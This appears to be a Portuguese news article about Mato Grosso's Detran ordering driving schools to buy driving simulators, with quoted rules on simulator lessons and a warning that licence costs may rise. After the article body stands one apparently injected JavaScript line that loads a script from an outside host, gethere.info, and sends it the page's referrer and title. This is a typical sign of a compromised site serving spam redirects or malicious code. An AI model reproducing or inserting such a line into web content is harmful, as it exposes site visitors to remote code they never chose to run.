Capa / Cidades / Detran obriga autoescolas de MT adquirir simulador que vai aumentar preço das novas CNHs

Detran obriga autoescolas de MT adquirir simulador que vai aumentar preço das novas CNHs

simuladorO presidente do Departamento Estadual de Trânsito de MT (Detran/MT), Rogers Elizandro Jarbas, baixou a portaria nº 016/2016 que prevê mudanças na formação de condutores da categoria ‘B’ em Mato Grosso.

De acordo com a portaria, os donos de autoescolas do Estado têm 180 dias (seis meses) para adquirir os simuladores de direção.

O polêmico equipamento deve aumentar o custo da habilitação em Mato Grosso em até 30%.

Segundo informações da portaria, “os Centros de Formação de Condutores deverão, obrigatoriamente, utilizar simuladores de direção veicular fabricados ou comercializados por empresas homologadas pelo DENATRAN e cadastrados pela Coordenadoria de Controle de Formação de Condutores do DETRAN-MT”, diz trecho do documento.

Ainda de acordo com a portaria, “serão consideradas nulas as aulas em simulador de direção veicular ministradas em equipamentos fornecidos por empresas não homologadas e não cadastradas nos termos do “caput” deste artigo, sem prejuízo da apuração das responsabilidades dos CFC envolvidos e de seu respectivo corpo diretivo e técnico”.

As aulas realizadas em simuladores de direção veicular, ministradas em qualquer horário após a conclusão das aulas teóricas e limitadas a 50 (cinquenta) minutos cada, serão distribuídas da seguinte forma e ordem:

  1. a) Preparação para que o aluno(s) receba(m) orientações gerais e conceitos que serão abordados durante a aula;
  2. b) Realização da aula no simulador de direção veicular, fixado em 30 (trinta) minutos, reproduzindo cenários que atendam o conteúdo didático-pedagógico estabelecido em Resolução.
  • 1º O Instrutor, o Diretor de Ensino ou o Diretor Geral do Centro de Formação de Condutores realizará a supervisão do aluno durante as aulas ministradas no simulador de direção veicular, prestando-lhe todos os esclarecimentos solicitados, sendo permitida a supervisão simultânea de no máximo 03 (três) alunos, desde que no interior de um único ambiente.
  • 2º Poderão ser realizadas até 03 (três) aulas no simulador de direção veicular, em um mesmo dia, simultaneamente ou não.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top